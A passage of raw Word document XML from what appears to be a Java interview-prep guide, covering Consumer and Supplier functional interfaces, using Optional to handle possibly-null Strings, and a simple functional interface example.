        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64F40D80"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D5D1EAB"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r>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="40866693" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218619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ny type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="5C496321" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F19E798"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T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="6CA60955" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066CC2A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r>
    </w:tbl>
    <w:p w14:paraId="1D976E97" w14:textId="7E927FF0" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00936CAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="31A769CC">
          <v:rect id="_x0000_i1752" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA38166" w14:textId="27485952" w:rsidR="001A3A61" w:rsidRPr="00CE4B95" w:rsidRDefault="001A3A61">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="_Toc197867467"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Consumer and Supplier?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="17A7DE2E" w14:textId="19E2E7F3" w:rsidR="001A3A61" w:rsidRPr="00CE4B95"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umer&lt;T&gt; – Takes input, returns nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B241BB7" w14:textId="2FF5197E"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53438FF9" w14:textId="6D83C68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modifying objects, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F71EA5"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CAF5AB1" w14:textId="77777777"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FE855F5" w14:textId="3BFFB06D"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John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E98AE"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53" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4277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pplier&lt;T&gt; – Gives output, takes nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A3142" w14:textId="1A520526"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function that supplies a value without any input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252079BC" w14:textId="579C486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T get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EAE315" w14:textId="2192DA8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roviding default values, random numbers, object generation, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731688E6"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3EEE2C7" w14:textId="77777777"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uppli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upply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nonymous"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548609DA" w14:textId="4E567FA1"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Na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nonymous</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7801CCD2"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54" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B93BD"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CE4B95" w14:paraId="15A18BF9" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FFB8D0"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pplier&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="7101CAA2" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7183802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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="5B0D3A86" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CC7A60E"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value of type T</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="31845BB1" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="258B087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r>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="777DDD29" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBE6B6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or supplying values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="50AAABA6" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="329A76C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provide values to collections or APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E87E6DB"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55" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB03A71"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF0DE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Consumer to print list elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DEADA7"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p>
    <w:p w14:paraId="12CDBE14" w14:textId="6A18FBCA"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00716FC8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidR="00716FC8"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6F93A91F" w14:textId="11B78E67" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="006A0D9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECC055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Supplier to generate random numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F3626"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upplier</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Doubl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randomSupplie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andom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11FFBB" w14:textId="38864473"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Random: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randomSupplie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p>
    <w:p w14:paraId="074CFAC7"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56" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D602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CE4B95" w14:paraId="0E8DBBC9" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="609EE3C1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="1E6EED94" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E69D30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37ED1C9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 update, store, log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w14:paraId="513A01BE" w14:textId="77777777" w:rsidTr="006A0D9E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209D11F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5B57DF1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y value, create object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14018D38" w14:textId="2DF49DCE" w:rsidR="00912200" w:rsidRPr="00CE4B95"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57" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5FF7A" w14:textId="77777777" w:rsidR="005C5D19" w:rsidRPr="00CE4B95" w:rsidRDefault="005C5D19">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="_Toc197867468"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Optional case returning null and String, how to handle it? What are the advantages of using it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
    </w:p>
    <w:p w14:paraId="0D03D689" w14:textId="3FA08444" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F"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blem Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749FC2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have a method that might return a String or null, and you want to handle it cleanly using Optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5BD284"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8F3651">
          <v:rect id="_x0000_i1758" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A7E414"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out Optional (Prone to NullPointerException):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E58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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1F38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or return "Siddhant";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4829A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73D56C" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCF6893"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4BEBAF2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ystem.out.println(name.toUpperCas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y throw NPE if name is null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB96FB"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38FCE">
          <v:rect id="_x0000_i1759" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CBE1E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Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6B9D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Name() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33E28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null); // or Optional.of("Siddhant");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5486B0E2"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3CA564" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A1DEA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Handling safely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E645D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0811246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14AEC6E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DEFAULT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011884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name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6B988"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09C2A">
          <v:rect id="_x0000_i1760" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16285BCB"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andling Optional - Different Ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255635D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Str = Optional.ofNullable(getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775D452F" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50341D7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1. Check presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B9F78"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ptionalStr.isPresent()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2801A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tionalStr.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9AE4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FF7B83" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3220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2. Use orElse / orElseGet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1160F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 = optionalStr.orElse("Default Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC1A5E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2 = optionalStr.orElseGet(() -&gt; "Generated Default");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26060494" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEA790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3. Use map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132FF6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optionalStr.map(String::toUpperCase).orElse("DEFAULT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7BF84A" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF116CF"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4. Use ifPresent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04DA9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Str.ifPresent(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41BE93"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3D84A">
          <v:rect id="_x0000_i1761" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438D555"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5445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="2BCD4F80" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="735D061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52C006AF"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4B95" w:rsidRPr="00CE4B95" w14:paraId="5AB338DD" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E6FB8D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NullPointerExceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F13EE8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s accidental null usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="129FF8D7" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2899657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ability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD6E87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early states that a value </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>may</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> be absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="39BB1EF7" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E1A160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Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CB5CF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use of map, filter, flatMap, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="2C9CFCEF" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A9FC7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fer Defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB1231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 orElseGet, and orElseThrow provide graceful fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="027E8F67" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA017C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ner API Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21BD9EB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gnals intent better than returning null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B394470" w14:textId="7F321323"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62" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88FA62" w14:textId="77777777" w:rsidR="009F7CCD" w:rsidRPr="00CE4B95" w:rsidRDefault="009F7CCD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="_Toc197867469"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Give an example of Functional Interface in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="4F84E353" w14:textId="14D3B826" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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multiple default or static methods, but they must have just one abstract method. Functional interfaces can be used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>target types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for lambda expressions and method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811D5F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 Functional Interface in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A7DB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reate a simple functional interface called Greeting that defines an abstract method sayHello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C66BB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alInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E295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Greeting {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A249F6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  // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0355F5" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
